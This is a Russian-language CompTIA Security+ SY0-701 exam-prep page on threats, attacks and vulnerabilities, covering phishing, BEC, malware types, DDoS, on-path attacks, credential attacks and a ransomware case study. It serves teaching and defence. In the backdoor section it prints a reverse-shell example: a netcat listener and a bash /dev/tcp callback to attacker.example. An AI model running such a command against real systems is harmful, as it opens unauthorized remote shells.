CompTIA SY0-701: Угрозы, атаки и уязвимости — Руководство по подготовке
Часть CompTIA Security+ SY0-701 — Руководство по подготовке. Практикуйтесь с проверенными ответами в центре экзаменов CompTIA, или пройдите тесты на время на ExamRoll.io.
Современный ландшафт угроз определяется злоумышленниками, которые сочетают технические эксплойты с манипуляцией людьми, объединяют уязвимости с низким уровнем серьезности в компрометации с высокими последствиями и маскируют свою деятельность под легитимные бизнес-процессы. Понимание угроз начинается с понимания намерения, возможностей и вектора, а также с отказа принимать поверхностный симптом за полное объяснение.
Социальная инженерия и разновидности фишинга
Социальная инженерия эксплуатирует доверие, срочность, авторитет или любопытство, а не программные уязвимости. Традиционный фишинг забрасывает широкую сеть с помощью электронной почты, рассылая тысячам получателей общие приманки, такие как поддельные уведомления о доставке или запросы на сброс пароля. Целевой фишинг (spear phishing) сужает охват, используя данные разведки из LinkedIn, корпоративных сайтов или утечек данных для создания сообщений, адаптированных для конкретного человека или отдела. Уэйлинг (whaling) нацелен на руководителей — классической целью является финансовый директор, получающий сообщение, которое выглядит так, будто оно пришло от внешнего юрисконсульта, — потому что их полномочия позволяют совершать мошенничество с более серьезными последствиями.
Варианты, использующие другие каналы, переносят те же манипуляции в иные среды. Вишинг (голосовой фишинг) использует телефонные звонки, часто с поддельным Caller ID и предлогом, например, выдавая себя за сотрудника IT-поддержки для получения кодов MFA. Смишинг использует SMS, часто применяя сокращенные URL и приманки, специфичные для мобильных устройств («Ваша посылка не может быть доставлена — перенесите доставку здесь»). Поскольку мобильные браузеры обрезают URL и скрывают детали сертификатов, смишинг имеет непропорционально высокий процент успеха.
Компрометация деловой переписки (BEC) заслуживает особого внимания, поскольку обычно она вообще не связана с вредоносным ПО. Злоумышленник, который либо скомпрометировал легитимный почтовый ящик, либо подделал похожий домен (accounts@vend0r-corp.com вместо accounts@vendor-corp.com), вклинивается в реальную переписку по счету и перенаправляет банковский перевод. Поскольку содержание письма контекстуально верно и в нем нет вложений, шлюзовые антивирусы и песочницы для URL практически не защищают. По данным IC3 ФБР, убытки от BEC превысили 2,9 миллиарда долларов за один год, что делает этот вид киберпреступности самым затратным с большим отрывом.
Распространенная ловушка — неверная интерпретация безобидных на первый взгляд симптомов. Когда пользователь вводит учетные данные на фишинговом сайте и получает ошибку «страница не найдена», инцидент не исчерпан — это завершенный сбор учетных данных, в ходе которого злоумышленник перенаправил жертву после их захвата. Отсутствие явной страницы с ошибкой — это особенность атаки, а не доказательство ее провала.
Типы вредоносного ПО
Вредоносное ПО — не монолит. Программы-вымогатели (Ransomware) шифруют данные и требуют выкуп, а современные варианты, такие как Ryuk, Conti и LockBit, также сначала похищают данные для двойного шантажа. Характерный признак — массовое изменение расширений файлов (файлы переименовываются в .ryk, .locked или случайную строку) в сочетании с записками с требованием выкупа, названными README.txt или HOW_TO_DECRYPT.html, в каждом каталоге.
Руткиты работают на гораздо более глубоком уровне, перехватывая структуры ядра, таблицы системных вызовов или прошивку (буткиты, импланты UEFI), чтобы скрыть процессы, файлы и сетевые соединения от самой операционной системы. Поскольку стандартные утилиты запрашивают информацию у ядра, которое контролирует руткит, выводу tasklist или ps доверять нельзя; обнаружение обычно требует создания криминалистического образа в автономном режиме или сравнения с заведомо исправным эталоном с помощью таких инструментов, как chkrootkit, или анализа памяти с помощью Volatility.
Бэкдоры обеспечивают постоянный несанкционированный доступ и часто устанавливаются после первоначальной компрометации. Они могут иметь форму запланированной задачи, которая отправляет сигналы на командный сервер (command-and-control), жестко закодированных учетных данных, вставленных в приложение, или прослушивающей службы на нестандартном порту. Типичным примером являются обратные оболочки (reverse shells), использующие такие инструменты, как Netcat или Meterpreter:
# Attacker listener
nc -lvnp 4444
# Victim callback (dropped by malware)
bash -i >& /dev/tcp/attacker.example/4444 0>&1
Ловушка здесь — туннельное зрение при сортировке инцидентов. Оповещение с пометкой «обнаружено вредоносное ПО», которое было быстро помещено в карантин, не означает, что инцидент исчерпан — начальный загрузчик (dropper) мог уже установить бэкдор или руткит, который агент на конечной точке не видит.
Сетевые атаки
Распределенные атаки типа «отказ в обслуживании» (DDoS) нацелены на доступность. Объемные (Volumetric) атаки — UDP-флуд, ICMP-флуд — потребляют всю пропускную способность канала. Атаки с отражением/усилением (Reflected/amplified) злоупотребляют сторонними сервисами, которые отвечают пакетами большего размера, чем запрос; DNS-запрос размером 60 байт с поддельным IP-адресом источника может вернуть ответ размером 3000 байт, а усиление через NTP monlist или memcached может достигать коэффициентов выше 50 000×. Когда публичные веб-сервисы остаются «включенными» на сервере, но недоступны из интернета, а сетевые журналы показывают всплеск трафика, причиной почти всегда является DDoS-атака, перегружающая вышестоящие каналы или таблицы состояний, а не ошибка в приложении.
Атаки «злоумышленник посередине» (On-path) (ранее «man-in-the-middle») помещают злоумышленника между двумя общающимися сторонами. В локальной сети обычным механизмом является отравление кэша ARP (ARP poisoning): злоумышленник отправляет незапрошенные ARP-ответы, заявляя, что IP-адрес шлюза принадлежит ему, в результате чего трафик жертвы незаметно маршрутизируется через хост злоумышленника. Инструменты вроде ettercap или arpspoof автоматизируют этот процесс, после чего злоумышленник может удалить TLS с помощью sslstrip или внедрить свой контент.
Тайпсквоттинг — это регистрация доменов, имитирующих легитимные (goggle.com, paypa1.com), чтобы перехватывать пользователей, допустивших опечатку в URL, или служить убедительной инфраструктурой для фишинга и BEC.
Атаки на учётные данные
Вместо эксплуатации уязвимостей в коде, атаки на учётные данные нацелены на слабую аутентификацию. Brute force (полный перебор) — это попытка подобрать все возможные пароли для одной учётной записи. Этот метод является «шумным» и приводит к срабатыванию политик блокировки. Password spraying (распыление паролей) использует обратную модель: одна-две очень распространённые комбинации (например, Winter2024!, Password123) проверяются на тысячах учётных записей, что позволяет оставаться ниже порога блокировки для каждой отдельной записи. Этот метод исключительно эффективен против организаций, не использующих MFA для своих облачных провайдеров идентификации.
Credential stuffing (подстановка учётных данных) заключается в использовании пар логин/пароль, полученных из предыдущих утечек, эксплуатируя повторное использование паролей в разных сервисах. Поскольку учётные данные действительны как минимум для одного сервиса, они обходят базовые средства контроля аутентификации. Утечка данных Okta в 2022 году началась с атаки credential stuffing на учётную запись сотрудника техподдержки, что демонстрирует: даже провайдеры идентификации не застрахованы, если MFA не применяется на всех путях привилегированного доступа.
Атаки Pass-the-hash и pass-the-ticket направлены на кражу аутентификационных данных из памяти, а не на взлом паролей. В системах Windows хеши NTLM, хранящиеся в памяти процесса LSASS, могут быть извлечены с помощью Mimikatz и повторно использованы для аутентификации на других системах без знания пароля в открытом виде. Аналогичным образом могут быть украдены и повторно использованы мандаты на получение билетов Kerberos (TGT). Меры противодействия включают Credential Guard (который изолирует LSASS в анклаве безопасности на основе виртуализации), членство в группе безопасности Protected Users и отключение NTLM там, где доступен Kerberos.
Практический сценарий: Атака программы-вымогателя через Password Spraying
Логистическая компания с 2400 сотрудниками не требовала обязательного использования MFA в своём тенанте Microsoft 365. Злоумышленник в течение трёх дней проводил атаку password spraying, проверяя пароль Summer2023! для всех известных адресов электронной почты, собранных из LinkedIn. Сорок одна учётная запись подошла. Используя одну из скомпрометированных учётных записей — регионального менеджера — злоумышленник получил доступ к VPN компании, который принимал учётные данные M365. Подключившись к VPN, злоумышленник две недели проводил внутреннюю разведку, выявляя серверы резервного копирования и контроллеры домена. В пятницу вечером на 340 серверах была активирована программа-вымогатель LockBit. Восстановление заняло 19 дней и обошлось примерно в 4,1 миллиона долларов, включая выкуп, услуги форензики и упущенную выгоду. Вся цепочка атаки стала возможной из-за одного отсутствующего средства контроля: MFA в тенанте M365. Атаку password spraying можно обнаружить — правило в SIEM, коррелирующее неудачные попытки аутентификации с одного IP-адреса для множества учётных записей, выявило бы её в первый же день.
← Управление идентификацией и доступом · Все домены · Сетевая безопасность и архитектура →
Отработать эти вопросы → · Тесты на время на ExamRoll.io →
Pass the whole exam — not just this question
You found this answer. Get every verified question and explanation in one place, and save hours of prep. Free to start.
Сдайте экзамен →